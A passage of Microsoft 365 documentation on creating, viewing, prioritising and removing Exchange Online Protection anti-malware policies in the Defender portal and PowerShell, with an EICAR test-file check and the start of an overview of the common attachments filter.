- - **Enable the common attachments filter**: If you select this option, messages with the specified attachments are treated as malware and are automatically quarantined. You can modify the list by clicking **Customize file types** and selecting or deselecting values in the list.
-
- For the default and available values, see [Common attachments filter in anti-malware policies](anti-malware-protection-about.md#common-attachments-filter-in-anti-malware-policies).
-
- **When these types are found**: Select one of the following values:
-
- - **Reject the message with a non-delivery report (NDR)** (this is the default value)
- - **Quarantine the message**
-
- - **Enable zero-hour auto purge for malware**: If you select this option, ZAP quarantines malware messages that have already been delivered. For more information, see [Zero-hour auto purge (ZAP) for malware](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-for-malware).
-
- - **Quarantine policy**: Select the quarantine policy that applies to messages that are quarantined as malware. By default, the quarantine policy named AdminOnlyAccessPolicy is used for malware detections. For more information about this quarantine policy, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
- > [!TIP]
- > Quarantine notifications are disabled in the policy named AdminOnlyAccessPolicy. To notify recipients that have messages quarantined as malware, create or use an existing quarantine policy where quarantine notifications are turned on. For instructions, see [Create quarantine policies in the Microsoft Defender portal](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
- >
- > Users can't release their own messages that were quarantined as malware by anti-malware policies, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
-
- - **Notifications** section:
-
- - **Admin notifications** section: Select none, one, or both of the following options:
- - **Notify an admin about undelivered messages from internal senders**: If you select this option, enter a recipient email address in the **Admin email address** box that appears.
- - **Notify an admin about undelivered messages from external senders**: If you select this option, enter a recipient email address in the **Admin email address** box that appears.
-
- > [!TIP]
- > Admin notifications are sent only for _attachments_ that are classified as malware.
- >
- > The quarantine policy that's assigned to the anti-malware policy determines whether recipients receive email notifications for messages that were quarantined as malware.
-
- - **Customize notifications** section: Use the settings in this section to customize the message properties that are used for admin notifications.
-
- - **Use customized notification text**: If you select this option, use the **From name** and **From address** boxes that appear to specify the sender's name and email address for admin notification messages.
-
- - **Customize notifications for messages from internal senders** section: If you previously selected **Notify an admin about undelivered messages from internal senders**, use the **Subject** and **Message** boxes that appear in this section to specify the subject and message body of admin notification messages.
-
- - **Customize notifications for messages from external senders** section: If you previously selected **Notify an admin about undelivered messages from external senders**, use the **Subject** and **Message** boxes that appear in this section to specify the subject and message body of admin notification messages.
-
- When you're finished on the **Protection settings** page, select **Next**.
-
-6. On the **Review** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review** page, select **Submit**.
-
-7. On the **Created new anti-malware policy** page, you can select the links to view the policy, view anti-malware policies, and learn more about anti-malware policies.
-
- When you're finished on the **Created new anti-malware policy** page, select **Done**.
-
- Back on the **Anti-malware** page, the new policy is listed.
-
-## Use the Microsoft Defender portal to view anti-malware policy details
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-Malware** in the **Policies** section. Or, to go directly to the **Anti-malware** page, use <https://security.microsoft.com/antimalwarev2>.
-
-On the **Anti-malware** page, the following properties are displayed in the list of anti-malware policies:
--- **Name**-- **Status**: Values are:
- - **Always on** for the default anti-malware policy.
- - **On** or **Off** for other anti-malware policies.
-- **Priority**: For more information, see the [Set the priority of custom anti-malware policies](#use-the-microsoft-defender-portal-to-set-the-priority-of-custom-anti-malware-policies) section.-
-To change the list of policies from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific anti-malware policies.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of policies to a CSV file.
-
-Select a policy by clicking anywhere in the row other than the check box next to the name to open the details flyout for the policy.
-
-> [!TIP]
-> To see details about other anti-malware policies without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Use the Microsoft Defender portal to take action on anti-malware policies
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-Malware** in the **Policies** section. To go directly to the **Anti-malware** page, use <https://security.microsoft.com/antimalwarev2>.
-
-On the **Anti-malware** page, select the anti-malware policy by using either of the following methods:
--- Select the policy from the list by selecting the check box next to the name. The following actions are available in the :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** dropdown list that appears:
- - **Enable selected policies**.
- - **Disable selected policies**.
- - **Delete selected policies**.
-
- :::image type="content" source="../../media/anti-malware-policies-main-page.png" alt-text="The Anti-malware page with a policy selected and the More actions control expanded." lightbox="../../media/anti-malware-policies-main-page.png":::
--- Select the policy from the list by clicking anywhere in the row other than the check box next to the name. Some or all following actions are available in the details flyout that opens:
- - Modify policy settings by clicking **Edit** in each section (custom policies or the default policy)
- - :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** or :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** or :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** (custom policies only)
-
- :::image type="content" source="../../media/anti-malware-policies-details-flyout.png" alt-text="The details flyout of a custom anti-malware policy." lightbox="../../media/anti-malware-policies-details-flyout.png":::
-
-The actions are described in the following subsections.
-
-### Use the Microsoft Defender portal to modify anti-malware policies
-
-After you select the default anti-malware policy or a custom policy by clicking anywhere in the row other than the check box next to the name, the policy settings are shown in the details flyout that opens. Select **Edit** in each section to modify the settings within the section. For more information about the settings, see the [Create anti-malware policies](#use-the-microsoft-defender-portal-to-create-anti-malware-policies) section earlier in this article.
-
-For the default policy, you can't modify the name of the policy, and there are no recipient filters to configure (the policy applies to all recipients). But, you can modify all other settings in the policy.
-
-For the anti-malware policies named **Standard Preset Security Policy** and **Strict Preset Security Policy** that are associated with [preset security policies](preset-security-policies.md), you can't modify the policy settings in the details flyout. Instead, you select :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **View preset security policies** in the details flyout to go to the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies> to modify the preset security policies.
-
-### Use the Microsoft Defender portal to enable or disable custom anti-malware policies
-
-You can't disable the default anti-malware policy (it's always enabled).
-
-You can't enable or disable the anti-malware policies that are associated with Standard and Strict preset security policies. You enable or disable the Standard or Strict preset security policies on the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies>.
-
-After you select an enabled custom anti-malware policy (the **Status** value is **On**), use either of the following methods to disable it:
--- **On the Anti-malware** page: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Disable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** at the top of the flyout.-
-After you select a disabled custom anti-malware policy (the **Status** value is **Off**), use either of the following methods to enable it:
--- **On the Anti-malware** page: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Enable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** at the top of the flyout.-
-On the **Anti-malware** page, the **Status** value of the policy is now **On** or **Off**.
-
-### Use the Microsoft Defender portal to set the priority of custom anti-malware policies
-
-Anti-malware policies are processed in the order that they're displayed on the **Anti-malware** page:
--- The anti-malware policy named **Strict Preset Security Policy** that's associated with the Strict preset security policy is always applied first (if the Strict preset security policy is [enabled](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users)).-- The anti-malware policy named **Standard Preset Security Policy** that's associated with the Standard preset security policy is always applied next (if the Standard preset security policy is enabled).-- Custom anti-malware policies are applied next in priority order (if they're enabled):
- - A lower priority value indicates a higher priority (0 is the highest).
- - By default, a new policy is created with a priority that's lower than the lowest existing custom policy (the first is 0, the next is 1, etc.).
- - No two policies can have the same priority value.
-- The default anti-malware policy always has the priority value **Lowest**, and you can't change it.-
-Anti-malware protection stops for a recipient after the first policy is applied (the highest priority policy for that recipient). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-After you select the custom anti-malware policy by clicking anywhere in the row other than the check box next to the name, you can increase or decrease the priority of the policy in the details flyout that opens:
--- The custom policy with the **Priority** value **0** on the **Anti-malware** page has the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** action at the top of the details flyout.-- The custom policy with the lowest priority (highest **Priority** value; for example, **3**) has the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** action at the top of the details flyout.-- If you have three or more policies, the policies between **Priority** 0 and the lowest priority have both the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** and the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** actions at the top of the details flyout.-
-When you're finished in the policy details flyout, select **Close**.
-
-Back on the **Anti-malware** page, the order of the policy in the list matches the updated **Priority** value.
-
-### Use the Microsoft Defender portal to remove custom anti-malware policies
-
-You can't remove the default anti-malware policy or the anti-malware policies named **Standard Preset Security Policy** and **Strict Preset Security Policy** that are associated with [preset security policies](preset-security-policies.md).
-
-After you select the custom anti-malware policy, use either of the following methods to remove it:
--- **On the Anti-malware** page: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Delete selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** at the top of the flyout.-
-Select **Yes** in the warning dialog that opens.
-
-On the **Anti-malware** page, the deleted policy is no longer listed.
-
-## Use Exchange Online PowerShell or standalone EOP PowerShell to configure anti-malware policies
-
-In PowerShell, the basic elements of an anti-malware policy are:
--- **The malware filter policy**: Specifies the recipient notification, sender and admin notification, ZAP, and the common attachments filter settings.-- **The malware filter rule**: Specifies the priority and recipient filters (who the policy applies to) for a malware filter policy.-
-The difference between these two elements isn't obvious when you manage anti-malware policies in the Microsoft Defender portal:
--- When you create an anti-malware policy in the Defender portal, you're actually creating a malware filter rule and the associated malware filter policy at the same time using the same name for both.-- When you modify an anti-malware policy in the Defender portal, settings related to the name, priority, enabled or disabled, and recipient filters modify the malware filter rule. Other settings (recipient notification, sender and admin notification, ZAP, and the common attachments filter) modify the associated malware filter policy.-- When you remove an anti-malware policy from the Defender portal, the malware filter rule and the associated malware filter policy are removed at the same time.-
-In Exchange Online PowerShell or standalone EOP PowerShell, the difference between malware filter policies and malware filter rules is apparent. You manage malware filter policies by using the **\*-MalwareFilterPolicy** cmdlets, and you manage malware filter rules by using the **\*-MalwareFilterRule** cmdlets.
--- In PowerShell, you create the malware filter policy first, then you create the malware filter rule that identifies the policy that the rule applies to.-- In PowerShell, you modify the settings in the malware filter policy and the malware filter rule separately.-- When you remove a malware filter policy from PowerShell, the corresponding malware filter rule isn't automatically removed, and vice versa.-
-### Use PowerShell to create anti-malware policies
-
-Creating an anti-malware policy in PowerShell is a two-step process:
-
-1. Create the malware filter policy.
-2. Create the malware filter rule that specifies the malware filter policy that the rule applies to.
-
- **Notes**:
--- You can create a new malware filter rule and assign an existing, unassociated malware filter policy to it. A malware filter rule can't be associated with more than one malware filter policy.-- There are two settings that you can configure on new anti-malware policies in PowerShell that aren't available in the Microsoft Defender portal until after you create the policy:
- - Create the new policy as disabled (_Enabled_ `$false` on the **New-MalwareFilterRule** cmdlet).
- - Set the priority of the policy during creation (_Priority_ _\<Number\>_) on the **New-MalwareFilterRule** cmdlet).
-- A new malware filter policy that you create in PowerShell isn't visible in the Microsoft Defender portal until you assign the policy to a malware filter rule.-
-#### Step 1: Use PowerShell to create a malware filter policy
-
-To create a malware filter policy, use this syntax:
-
-```PowerShell
-New-MalwareFilterPolicy -Name "<PolicyName>" [-AdminDisplayName "<OptionalComments>"] [-EnableFileFilter <$true | $false>] [-FileTypeAction <Reject | Quarantine>] [-FileTypes FileType1,FileType2,...FileTypeN] [-CustomNotifications <$true | $false>] [<Inbound notification options>] [<Outbound notification options>] [-QuarantineTag <QuarantineTagName>]
-```
-
-This example creates a new malware filter policy named Contoso Malware Filter Policy with these settings:
--- Notify admin@contoso.com when malware is detected in a message from an internal sender.-- The common attachments filter is enabled (`-EnableFileFilter $true`) and the default list of file types is used (we aren't using the _FileTypes_ parameter).-- Messages detected by the common attachments filter are rejected with an NDR (we aren't using the _FileTypeAction_ parameter, and the default value is `Reject`).-- The default quarantine policy for malware detections is used (we aren't using the _QuarantineTag_ parameter).-
-```PowerShell
-New-MalwareFilterPolicy -Name "Contoso Malware Filter Policy" -EnableFileFilter $true -EnableInternalSenderAdminNotifications $true -InternalSenderAdminAddress admin@contoso.com
-```
-
-For detailed syntax and parameter information, see [New-MalwareFilterPolicy](/powershell/module/exchange/new-malwarefilterpolicy).
-
-#### Step 2: Use PowerShell to create a malware filter rule
-
-To create a malware filter rule, use this syntax:
-
-```PowerShell
-New-MalwareFilterRule -Name "<RuleName>" -MalwareFilterPolicy "<PolicyName>" <Recipient filters> [<Recipient filter exceptions>] [-Comments "<OptionalComments>"]
-```
-
-This example creates a new malware filter rule named Contoso Recipients with these settings:
--- The malware filter policy named Contoso Malware Filter Policy is associated with the rule.-- The rule applies to recipients in the contoso.com domain.-
-```PowerShell
-New-MalwareFilterRule -Name "Contoso Recipients" -MalwareFilterPolicy "Contoso Malware Filter Policy" -RecipientDomainIs contoso.com
-```
-
-For detailed syntax and parameter information, see [New-MalwareFilterRule](/powershell/module/exchange/new-malwarefilterrule).
-
-### Use PowerShell to view malware filter policies
-
-To return a summary list of all malware filter policies, run this command:
-
-```PowerShell
-Get-MalwareFilterPolicy
-```
-
-To return detailed information about a specific malware filter policy, use this syntax:
-
-```PowerShell
-Get-MalwareFilterPolicy -Identity "<PolicyName>" | Format-List [<Specific properties to view>]
-```
-
-This example returns all the property values for the malware filter policy named Executives.
-
-```PowerShell
-Get-MalwareFilterPolicy -Identity "Executives" | Format-List
-```
-
-This example returns only the specified properties for the same policy.
-
-```PowerShell
-Get-MalwareFilterPolicy -Identity "Executives" | Format-List Action,AdminDisplayName,CustomNotifications,Enable*Notifications
-```
-
-For detailed syntax and parameter information, see [Get-MalwareFilterPolicy](/powershell/module/exchange/get-malwarefilterpolicy).
-
-### Use PowerShell to view malware filter rules
-
-To return a summary list of all malware filter rules, run this command:
-
-```PowerShell
-Get-MalwareFilterRule
-```
-
-To filter the list by enabled or disabled rules, run the following commands:
-
-```PowerShell
-Get-MalwareFilterRule -State Disabled
-```
-
-```PowerShell
-Get-MalwareFilterRule -State Enabled
-```
-
-To return detailed information about a specific malware filter rule, use this syntax:
-
-```PowerShell
-Get-MalwareFilterRule -Identity "<RuleName>" | Format-List [<Specific properties to view>]
-```
-
-This example returns all the property values for the malware filter rule named Executives.
-
-```PowerShell
-Get-MalwareFilterRule -Identity "Executives" | Format-List
-```
-
-This example returns only the specified properties for the same rule.
-
-```PowerShell
-Get-MalwareFilterRule -Identity "Executives" | Format-List Name,Priority,State,MalwareFilterPolicy,*Is,*SentTo,*MemberOf
-```
-
-For detailed syntax and parameter information, see [Get-MalwareFilterRule](/powershell/module/exchange/get-malwarefilterrule).
-
-### Use PowerShell to modify malware filter policies
-
-Other than the following items, the same settings are available when you modify a malware filter policy in PowerShell as when you create the policy as described in the [Step 1: Use PowerShell to create a malware filter policy](#step-1-use-powershell-to-create-a-malware-filter-policy) section earlier in this article.
--- The _MakeDefault_ switch that turns the specified policy into the default policy (applied to everyone, unmodifiable **Lowest** priority, and you can't delete it) is only available when you modify a malware filter policy in PowerShell.-- You can't rename a malware filter policy (the **Set-MalwareFilterPolicy** cmdlet has no _Name_ parameter). When you rename an anti-malware policy in the Microsoft Defender portal, you're only renaming the malware filter _rule_.-
-To modify a malware filter policy, use this syntax:
-
-```PowerShell
-Set-MalwareFilterPolicy -Identity "<PolicyName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-MalwareFilterPolicy](/powershell/module/exchange/set-malwarefilterpolicy).
-
-> [!TIP]
-> For detailed instructions to specify the quarantine policy to use in a malware filter policy, see [Use PowerShell to specify the quarantine policy in anti-malware policies](quarantine-policies.md#anti-malware-policies-in-powershell).
-
-### Use PowerShell to modify malware filter rules
-
-The only setting that isn't available when you modify a malware filter rule in PowerShell is the _Enabled_ parameter that allows you to create a disabled rule. To enable or disable existing malware filter rules, see the next section.
-
-Otherwise, no additional settings are available when you modify a malware filter rule in PowerShell. The same settings are available when you create a rule as described in the [Step 2: Use PowerShell to create a malware filter rule](#step-2-use-powershell-to-create-a-malware-filter-rule) section earlier in this article.
-
-To modify a malware filter rule, use this syntax:
-
-```PowerShell
-Set-MalwareFilterRule -Identity "<RuleName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-MalwareFilterRule](/powershell/module/exchange/set-malwarefilterrule).
-
-### Use PowerShell to enable or disable malware filter rules
-
-Enabling or disabling a malware filter rule in PowerShell enables or disables the whole anti-malware policy (the malware filter rule and the assigned malware filter policy). You can't enable or disable the default anti-malware policy (it's always applied to all recipients).
-
-To enable or disable a malware filter rule in PowerShell, use this syntax:
-
-```PowerShell
-<Enable-MalwareFilterRule | Disable-MalwareFilterRule> -Identity "<RuleName>"
-```
-
-This example disables the malware filter rule named Marketing Department.
-
-```PowerShell
-Disable-MalwareFilterRule -Identity "Marketing Department"
-```
-
-This example enables same rule.
-
-```PowerShell
-Enable-MalwareFilterRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Enable-MalwareFilterRule](/powershell/module/exchange/enable-malwarefilterrule) and [Disable-MalwareFilterRule](/powershell/module/exchange/disable-malwarefilterrule).
-
-### Use PowerShell to set the priority of malware filter rules
-
-The highest priority value you can set on a rule is 0. The lowest value you can set depends on the number of rules. For example, if you have five rules, you can use the priority values 0 through 4. Changing the priority of an existing rule can have a cascading effect on other rules. For example, if you have five custom rules (priorities 0 through 4), and you change the priority of a rule to 2, the existing rule with priority 2 is changed to priority 3, and the rule with priority 3 is changed to priority 4.
-
-To set the priority of a malware filter rule in PowerShell, use the following syntax:
-
-```PowerShell
-Set-MalwareFilterRule -Identity "<RuleName>" -Priority <Number>
-```
-
-This example sets the priority of the rule named Marketing Department to 2. All existing rules that have a priority less than or equal to 2 are decreased by 1 (their priority numbers are increased by 1).
-
-```PowerShell
-Set-MalwareFilterRule -Identity "Marketing Department" -Priority 2
-```
-
-> [!TIP]
-> To set the priority of a new rule when you create it, use the _Priority_ parameter on the **New-MalwareFilterRule** cmdlet instead.
->
-> The default malware filter policy doesn't have a corresponding malware filter rule, and it always has the unmodifiable priority value **Lowest**.
-
-### Use PowerShell to remove malware filter policies
-
-When you use PowerShell to remove a malware filter policy, the corresponding malware filter rule isn't removed.
-
-To remove a malware filter policy in PowerShell, use this syntax:
-
-```PowerShell
-Remove-MalwareFilterPolicy -Identity "<PolicyName>"
-```
-
-This example removes the malware filter policy named Marketing Department.
-
-```PowerShell
-Remove-MalwareFilterPolicy -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-MalwareFilterPolicy](/powershell/module/exchange/remove-malwarefilterpolicy).
-
-### Use PowerShell to remove malware filter rules
-
-When you use PowerShell to remove a malware filter rule, the corresponding malware filter policy isn't removed.
-
-To remove a malware filter rule in PowerShell, use this syntax:
-
-```PowerShell
-Remove-MalwareFilterRule -Identity "<PolicyName>"
-```
-
-This example removes the malware filter rule named Marketing Department.
-
-```PowerShell
-Remove-MalwareFilterRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-MalwareFilterRule](/powershell/module/exchange/remove-malwarefilterrule).
-
-## How do you know these procedures worked?
-
-### Use the EICAR.TXT file to verify your anti-malware policy settings
-
-> [!IMPORTANT]
-> The EICAR.TXT file is not a virus. The European Institute for Computer Antivirus Research (EICAR) developed this file to safely test anti-virus solutions.
-
-1. Open Notepad and paste the following text into an empty file:
-
- ```Text
- X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
- ```
-
- Be sure that these characters are the only text in the file. The file size should be 68 bytes.
-
-2. Save the file as EICAR.TXT
-
- In your desktop anti-virus program, be sure to exclude the EICAR.TXT from scanning (otherwise, the file will be quarantined).
-
-3. Send an email message that contains the EICAR.TXT file as an attachment, using an email client that won't automatically block the file, and using an email service that doesn't automatically block outbound spam. Use your anti-malware policy settings to determine the following scenarios to test:
- - Email from an internal mailbox to an internal recipient.
- - Email from an internal mailbox to an external recipient.
- - Email from an external mailbox to an internal recipient.
-
-4. Verify that the message was quarantined, and verify the admin notification results based on your anti-malware policy settings. For example, the admin email address that you specified is notified for internal or external message senders, with the default or customized notification messages.
-
-5. Delete the EICAR.TXT file after your testing is complete (so other users aren't unnecessarily alarmed by it).
security Anti Malware Protection About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-malware-protection-about.md
- Title: Anti-malware protection
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-description: Admins can learn about anti-malware protection and anti-malware policies that protect against viruses, spyware, and ransomware in Exchange Online Protection (EOP).
-- Previously updated : 4/8/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Anti-malware protection in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, email messages are automatically protected against malware by EOP. Some of the major categories of malware are:
--- **Viruses** that infect other programs and data, and spread through your computer or network looking for programs to infect.-- **Spyware** that gathers your personal information, such as sign-in information and personal data, and sends it back to its author.-- **Ransomware** that encrypts your data and demands payment to decrypt it. Anti-malware software doesn't help you decrypt encrypted files, but it can detect the malware payload that's associated with the ransomware.-
-EOP offers multi-layered malware protection that's designed to catch all known malware in Windows, Linux, and Mac that travels into or out of your organization. The following options help provide anti-malware protection:
--- **Layered defenses against malware**: Multiple anti-malware scan engines help protect against both known and unknown threats. These engines include powerful heuristic detection to provide protection even during the early stages of a malware outbreak. This multi-engine approach has been shown to provide significantly more protection than using just one anti-malware engine.-- **Real-time threat response**: During some outbreaks, the anti-malware team might have enough information about a virus or other form of malware to write sophisticated policy rules that detect the threat, even before a definition is available from any of the scan engines used by the service. These rules are published to the global network every 2 hours to provide your organization with an extra layer of protection against attacks.-- **Fast anti-malware definition deployment**: The anti-malware team maintains close relationships with partners who develop anti-malware engines. As a result, the service can receive and integrate malware definitions and patches before they're publicly released. Our connection with these partners often allows us to develop our own remedies as well. The service checks for updated definitions for all anti-malware engines every hour.-
-In EOP, messages that are found to contain malware in _any_ attachments are quarantined<sup>\*</sup>. Whether the recipients can view or otherwise interact with the quarantined messages is controlled by _quarantine policies_. By default, messages that were quarantined due to malware can only be viewed and released by admins. Users can't release their own quarantined malware messages, regardless of any available settings that admins configure. For more information, see the following articles:
-
-<sup>\*</sup> Malware filtering is skipped on SecOps mailboxes that are identified in the advanced delivery policy. For more information, see [Configure the advanced delivery policy for third-party phishing simulations and email delivery to SecOps mailboxes](advanced-delivery-policy-configure.md).
--- [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy)-- [Manage quarantined messages and files as an admin in EOP](quarantine-admin-manage-messages-files.md).-
-Anti-malware policies also contain a _common attachments filter_. Messages that contain the specified file types are _automatically_ identified as malware. For more information, see the [Common attachments filter in anti-malware policies](#common-attachments-filter-in-anti-malware-policies) section later in this article.
-
-For more information about anti-malware protection, see the [Anti-malware protection FAQ](anti-malware-protection-faq.yml).
-
-To configure the default anti-malware policy, and to create, modify, and remove custom anti-malware policies, see [Configure anti-malware policies](anti-malware-policies-configure.md). In the Standard and Strict [preset security policies](preset-security-policies.md), the anti-malware policy settings are already configured and unmodifiable as described in [EOP anti-malware policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-malware-policy-settings).
-
-> [!TIP]
-> If you disagree with the malware verdict, you can report the message attachment to Microsoft as a false positive (good attachment marked as bad) or a false negative (bad attachment allowed). For more information, see [How do I report a suspicious email or file to Microsoft?](submissions-report-messages-files-to-microsoft.md).
-
-## Anti-malware policies
-
-Anti-malware policies control the configurable settings and notification options for malware detections. The important settings in anti-malware policies are described in the following subsections.
-
-### Recipient filters in anti-malware policies
-
-Recipient filters use conditions and exceptions to identify the internal recipients that the policy applies to. At least one condition is required in custom policies. Conditions and exceptions aren't available in the default policy (the default policy applies to all recipients). You can use the following recipient filters for conditions and exceptions:
--- **Users**: One or more mailboxes, mail users, or mail contacts in the organization.-- **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
-- **Domains**: One or more of the configured [accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in Microsoft 365. The recipient's primary email address is in the specified domain.-
-You can use a condition or exception only once, but the condition or exception can contain multiple values:
--- Multiple **values** of the **same condition or exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_):
- - **Conditions**: If the recipient matches **any** of the specified values, the policy is applied to them.
- - **Exceptions**: If the recipient matches **any** of the specified values, the policy isn't applied to them.
--- Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.--- Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
-### Common attachments filter in anti-malware policies
-
-There are certain types of files that you really shouldn't send via email (for example, executable files). Why bother scanning these types of files for malware when you should block them all, anyway? That's where the common attachments filter comes in. The file types that you specify are automatically identified as malware.
-
-A list of default file types is used in the default anti-malware policy, in custom anti-malware policies that you create, and in the anti-malware policies in the Standard and Strict [preset security policies](preset-security-policies.md).
-
-In the Microsoft Defender portal, you can select from a list of additional file types or add your own values when you create or modify anti-malware policies in the Microsoft Defender portal.
--- **Default file types**: `ace, ani, apk, app, appx, arj, bat, cab, cmd, com, deb, dex, dll, docm, elf, exe, hta, img, iso, jar, jnlp, kext, lha, lib, library, lnk, lzh, macho, msc, msi, msix, msp, mst, pif, ppa, ppam, reg, rev, scf, scr, sct, sys, uif, vb, vbe, vbs, vxd, wsc, wsf, wsh, xll, xz, z`.--- **Additional file types to select in the Defender portal**: `7z, 7zip, a, accdb, accde, action, ade, adp, appxbundle, asf, asp, aspx, avi, bas, bin, bundle, bz, bz2, bzip2, caction, cer, chm, command, cpl, crt, csh, css, der, dgz, dmg, doc, docx, dos, dot, dotm, dtox [sic], dylib, font, fxp, gadget, gz, gzip, hlp, Hta, htm, html, imp, inf, ins, ipa, isp, its, js, jse, ksh, Lnk, lqy, mad, maf, mag, mam, maq, mar, mas, mat, mau, mav, maw, mda, mdb, mde, mdt, mdw, mdz, mht, mhtml, mscompress, msh, msh1, msh1xml, msh2, msh2xml, mshxml, msixbundle, o, obj, odp, ods, odt, one, onenote, ops, os2, package, pages, pbix, pcd, pdb, pdf, php, pkg, plg, plugin, pps, ppsm, ppsx, ppt, pptm, pptx, prf, prg, ps1, ps1xml, ps2, ps2xml, psc1, psc2, pst, pub, py, rar, rpm, rtf, scpt, service, sh, shb, shs, shtm, shx, so, tar, tarz, terminal, tgz, tmp, tool, url, vhd, vsd, vsdm, vsdx, vsmacros, vss, vssx, vst, vstm, vstx, vsw, w16, workflow, ws, xhtml, xla, xlam, xls, xlsb, xlsm, xlsx, xlt, xltm, xltx, xnk, zi, zip, zipx`.-
-When files are detected by the common attachments filter, you can choose to **Reject the message with a non-delivery report (NDR)** or **Quarantine the message**.
-
-#### True type matching in the common attachments filter
-
-The common attachments filter uses best effort true type matching to detect the file type, regardless of the filename extension. True type matching uses file characteristics to determine the real file type (for example, leading and trailing bytes in the file). For example, if an `exe` file is renamed with a `txt` filename extension, the common attachments filter detects the file as an `exe` file.
-
-True type matching in the common attachments filter supports the following file types:
-
